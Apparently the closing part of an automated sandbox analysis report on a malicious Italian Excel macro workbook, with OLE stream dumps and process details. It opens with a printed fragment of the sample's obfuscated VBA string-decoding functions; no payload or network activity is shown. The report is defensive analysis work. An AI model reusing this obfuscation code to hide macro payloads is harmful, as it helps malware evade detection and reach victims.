                                                                                                                                                If Not (IsNumeric(B)) Then ol = LTrim(Left(B, HkE("" & B) - 1)) Else ol = LTrim(B)
                                                                                                                                                M = M & Chr(ol)
                                                                                                                                                Next
                                                                                                                                                chiiI = Split(M, "" & 8)
                                                                                                                                                End Function
                                                                                                                                                
                                                                                                                                                Function tTagils() As String
                                                                                                                                                tTagils = "O"
                                                                                                                                                End Function
                                                                                                                                                Function gesstione()
                                                                                                                                                gesstione = tTagils: gesstione = "="
                                                                                                                                                End Function
                                                                                                                                                Function HkE(a As String)
                                                                                                                                                HkE = Len(a)
                                                                                                                                                End Function
                                                                                                                                                
                                                                                                                                                Public Function Ssono(a As String, z As Long) As Variant
                                                                                                                                                    Dim q As Long, pk As Long
                                                                                                                                                    Dim il() As String
                                                                                                                                                ReDim il(0 To CLng((HkE(a) / z) - 1))
                                                                                                                                                
                                                                                                                                                    For q = 1 To HkE(a) Step z
                                                                                                                                                        il(pk) = Mid(a, q, z): pk = pk + 1
                                                                                                                                                Next
                                                                                                                                                Ssono = il
                                                                                                                                                End Function

                                                                                                                                                Streams

                                                                                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 118
                                                                                                                                                General
                                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:118
                                                                                                                                                Entropy:4.32915524493
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F * . . . ( F o g l i o d i l a v o r o d i M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 2a 00 00 00 28 46 6f 67 6c 69 6f 20 64 69 20 6c 61 76 6f 72 6f 20 64 69 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 248
                                                                                                                                                General
                                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:248
                                                                                                                                                Entropy:2.78187154374
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 0 2 1 1 0 . . . . . . . . . . . . . . . . . F o g l i d i l a v o r o . . . . . . . . .
                                                                                                                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a0 00 00 00
                                                                                                                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 160
                                                                                                                                                General
                                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:160
                                                                                                                                                Entropy:3.0437641747
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . p . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . X . . . . . . . ` . . . . . . . . . . . . . . . . . . . @ . . . . . . . v . . . @ . . . . . . . v . . . . . . . . . . . . . . . . . . . ' ' B R T . . .
                                                                                                                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 70 00 00 00 05 00 00 00 01 00 00 00 38 00 00 00 0c 00 00 00 40 00 00 00 0d 00 00 00 4c 00 00 00 13 00 00 00 58 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e4 04 00 00 40 00 00 00 e0 03 9d 84 76 be d7 01 40 00 00 00
                                                                                                                                                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 28527
                                                                                                                                                General
                                                                                                                                                Stream Path:Workbook
                                                                                                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                Stream Size:28527
                                                                                                                                                Entropy:6.28607255882
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . C
                                                                                                                                                Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 454
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:454
                                                                                                                                                Entropy:5.34024688628
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:I D = " { 4 5 6 C 0 9 9 E - 4 D E E - 4 4 5 9 - 9 9 9 E - 2 4 3 6 C D 6 1 0 0 B 1 } " . . D o c u m e n t = Q u e s t a _ c a r t e l l a _ d i _ l a v o r o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 0 8 2 5 2 5 0 5 6 5 0 5 6 5 0 5 6 5 0 5 6 " . . D P B = " 2 6 2 4 F 4 5 0 3 C 5 0 E 3 5 1 E 3 5 1 E 3 " . . G C = "
                                                                                                                                                Data Raw:49 44 3d 22 7b 34 35 36 43 30 39 39 45 2d 34 44 45 45 2d 34 34 35 39 2d 39 39 39 45 2d 32 34 33 36 43 44 36 31 30 30 42 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:104
                                                                                                                                                Entropy:3.33133492199
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . Q . u . e . s . t . a . _ . c . a . r . t . e . l . l . a . _ . d . i . _ . l . a . v . o . r . o . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . . .
                                                                                                                                                Data Raw:51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 00 51 00 75 00 65 00 73 00 74 00 61 00 5f 00 63 00 61 00 72 00 74 00 65 00 6c 00 6c 00 61 00 5f 00 64 00 69 00 5f 00 6c 00 61 00 76 00 6f 00 72 00 6f 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 00 00
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2979
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:2979
                                                                                                                                                Entropy:4.43610309509
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                Data Raw:cc 61 b5 00 00 03 00 ff 10 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2019
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:2019
                                                                                                                                                Entropy:3.35046169998
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . K G . v . . . J . . , . . | _ X . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 268
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:268
                                                                                                                                                Entropy:1.7944240825
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d d . . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . z N . . .
                                                                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 2797
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:2797
                                                                                                                                                Entropy:1.97411509248
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:72 55 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 d0 00 00 00 00 00 00 00 00 00 00 00 0e 00 0e 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 03 00 00 00 00 00 00 00 00 00 00 11 08 00 00 00 00 00 00 00 00 00 00 41 08
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 1000
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:1000
                                                                                                                                                Entropy:2.49662055587
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . X . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . F . O . @ . . . . . . . . . . . . . . . . ` . . . . . .
                                                                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 40 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 04 01 d9 08 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 563
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:563
                                                                                                                                                Entropy:6.24783906376
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. / . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . y = . W c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
                                                                                                                                                Data Raw:01 2f b2 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e4 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 79 3d a0 57 63 02 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

                                                                                                                                                Network Behavior

                                                                                                                                                No network behavior found

                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:00:22:12
                                                                                                                                                Start date:12/10/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0x80000
                                                                                                                                                File size:27110184 bytes
                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >